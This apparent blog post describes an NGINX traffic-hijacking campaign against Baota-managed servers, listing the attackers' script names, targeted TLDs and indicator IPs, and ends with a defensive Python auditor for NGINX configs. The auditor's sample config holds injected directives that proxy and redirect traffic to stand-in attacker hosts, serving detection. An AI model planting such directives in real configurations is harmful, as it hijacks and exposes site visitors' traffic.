NGINX Hijacking Campaign Targeting Asian TLDs: Threat, Tactics, and Implications
Source: Dev.to
Navigating the Web Traffic Hijacking Campaign Targeting NGINX
A new campaign is targeting NGINX installations, especially those managed through the Baota (BT) panel. The operation uses malicious shell scripts to inject rogue configuration into NGINX so that inbound requests are captured and redirected through servers under the attacker's control. This is a sophisticated web-traffic hijacking effort with potential implications for Asian TLDs and beyond.
The Heart of the Attack
The campaign uses shell scripts to modify NGINX configuration files. The injected directives are crafted to:
- Capture inbound HTTP requests.
- Redirect traffic to attacker‑controlled servers.
- Facilitate data exfiltration or further malicious activities.
Where It Hits
The attackers focus on:
- Asian top‑level domains such as .in, .id, .pe, and .bd.
- Chinese hosting infrastructure.
- Government and educational domains (.gov, .edu).
These targets increase the potential impact due to the sensitivity of the affected sites.
The Tools at Their Disposal
Several custom scripts automate the intrusion process:
- zx.sh: Orchestrates the execution of subsequent stages in the attack.
- bt.sh: Targets Baota management panels and overwrites NGINX configurations with malicious rules.
- 4zdh.sh & zdh.sh: Enumerate common NGINX locations and minimize errors when creating new configuration files.
- ok.sh: Generates reports on active hijacking rules to assess the campaign's reach.
A Mystery Awaits
The identity of the threat actors remains unknown. However, the campaign appears to exploit vulnerabilities such as CVE-2025-55182, which may provide the initial foothold on compromised systems.
The GreyNoise Revelation
GreyNoise data highlights two IP addresses frequently associated with React2Shell exploitation attempts:
- 193.142.147[.]209
- 87.121.84[.]24
These hosts are considered hotspots for the hijacking activity.
Conclusion: A Call to Action
This campaign underscores the critical need for continuous vigilance in web security:
- Patch known vulnerabilities promptly (e.g., CVE-2025-55182).
- Monitor NGINX configurations for unauthorized changes.
- Implement network‑level defenses to detect and block suspicious traffic.
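As an added defensive example (not code from the article, and not one of the campaign's scripts), the following Python audits NGINX configuration text for the kind of proxy and redirect directives described earlier, reporting any whose destination host is not on an operator-defined allowlist, and fingerprints configuration files so that a later run can show which files changed without authorization. The sample configuration, the allowlist, and the `.invalid` hostnames are constructed for the demonstration.

```python
"""Audit NGINX configuration text for proxy/redirect directives that send
traffic to hosts outside an allowlist, and fingerprint config files so that
unauthorized changes stand out on the next run.

Added defensive example; the sample config and hostnames are constructed."""
import hashlib
import re

# HTTP status codes that make a `return` directive an external redirect.
REDIRECT_CODES = {"301", "302", "307", "308"}

# Host part of an absolute http(s) URL. A target whose host starts with a
# variable such as $host (the usual HTTP->HTTPS upgrade) does not match and
# is therefore not reported.
HOST_RE = re.compile(r"^https?://([^/:$?#]+)", re.IGNORECASE)


def _redirect_target(tokens):
    """Return the destination of a redirect-capable directive, or None."""
    name = tokens[0]
    if name == "proxy_pass" and len(tokens) >= 2:
        return tokens[1]
    if name == "return" and len(tokens) >= 3 and tokens[1] in REDIRECT_CODES:
        return tokens[2]
    if name == "rewrite" and len(tokens) >= 3:   # rewrite <regex> <replacement> [flag]
        return tokens[2]
    return None


def find_external_redirects(config_text, allowed_hosts):
    """Return [(line_no, directive, host)] for proxy_pass / return 30x /
    rewrite targets whose host is absolute and not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for line_no, raw in enumerate(config_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip().rstrip(";")   # drop comment and ';'
        if not line:
            continue
        tokens = line.split()
        target = _redirect_target(tokens)
        if target is None:
            continue
        match = HOST_RE.match(target.strip("'\""))
        if match and match.group(1).lower() not in allowed:
            findings.append((line_no, tokens[0], match.group(1).lower()))
    return findings


def fingerprint(text):
    """SHA-256 of a config file's text; store these as the known-good baseline."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def changed_files(baseline, current):
    """Names of files whose hash differs from the baseline or that are new.
    baseline: {filename: sha256 hex}, current: {filename: file text}."""
    return sorted(name for name, text in current.items()
                  if baseline.get(name) != fingerprint(text))


# Constructed sample: a normal site with two injected directives.
SAMPLE_CONFIG = """\
server {
    listen 80;
    server_name example.in;
    return 301 https://$host$request_uri;   # normal HTTPS upgrade, not reported
}
server {
    listen 443 ssl;
    server_name example.in;
    location / {
        proxy_pass http://127.0.0.1:8080;   # legitimate local upstream
    }
    location /search/ {
        proxy_pass https://relay.attacker.invalid;   # injected: off-site proxy
    }
    location /download/ {
        return 302 https://landing.attacker.invalid$request_uri;   # injected: off-site redirect
    }
}
"""
# Constructed allowlist: the site's own names plus local upstreams.
ALLOWED_HOSTS = {"example.in", "127.0.0.1"}

if __name__ == "__main__":
    for line_no, directive, host in find_external_redirects(SAMPLE_CONFIG, ALLOWED_HOSTS):
        print(f"line {line_no}: {directive} sends traffic to {host}")
```

In practice the allowlist should contain every `upstream` block name and internal address the site legitimately proxies to, so that only off-site destinations are reported; the fingerprint baseline is taken from a known-good copy of each file under the NGINX configuration directory and compared on a schedule, so a rewritten or newly dropped `.conf` file shows up even when its directives look plausible.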
Staying informed about emerging tactics and maintaining robust security hygiene are essential steps toward safeguarding digital infrastructure worldwide.